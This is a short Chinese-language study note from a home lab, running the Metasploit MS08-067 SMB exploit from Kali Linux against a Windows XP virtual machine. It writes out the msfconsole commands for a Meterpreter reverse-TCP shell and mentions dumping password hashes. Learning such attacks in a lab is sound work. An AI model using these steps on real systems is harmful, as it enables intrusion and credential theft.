准备:kail-linux和winXP SP2 简体中文版两部虚拟机
思路:在使用exploit攻击之后,被攻击机会产生反弹连接从而被控制
记得把被攻击机的防火墙关掉
在kail-linuxter的minal上输入msfconsole
,启动Metasploit渗透工具
这是我的metasploit的介绍:
1852个exploit模块(用来攻击的代码)
1046个anxiliary模块
325个post
541个payload(在攻击完之后进行操作的代码)
巴拉巴拉巴拉
在msf5下输入use exploit/windows/smb/ms08_067_netapi
(ms08_067_netapi是一个exploit模块的名字)
set PAYLOAD windows/meterpreter/reverse_tcp
(确定好攻击之后的操作)
RHOST是被攻击机的IP地址
LHOST是kail-linux的IP地址
exploit target是被攻击机的操作系统(默认自动)
set RHOST 52486486
set LHOST 546343486
show targets
最后一行这个show target可以显示当先这个exploit模块可以攻击哪一些系统
set target 目标系统的编号
再一次show options确认信息
exploit
(攻击开始)
当terminal变成meterpreter,攻击成功
我的kail-linux显示已经可以控制winXP了(显示的IP地址是XP的)
可以查看XP的后台啊,系统信息啊,管理员密码,访客密码啊(哈希值)
可以直接操作XP系统
退出的话按Ctrl+Z
第一次记录学习结束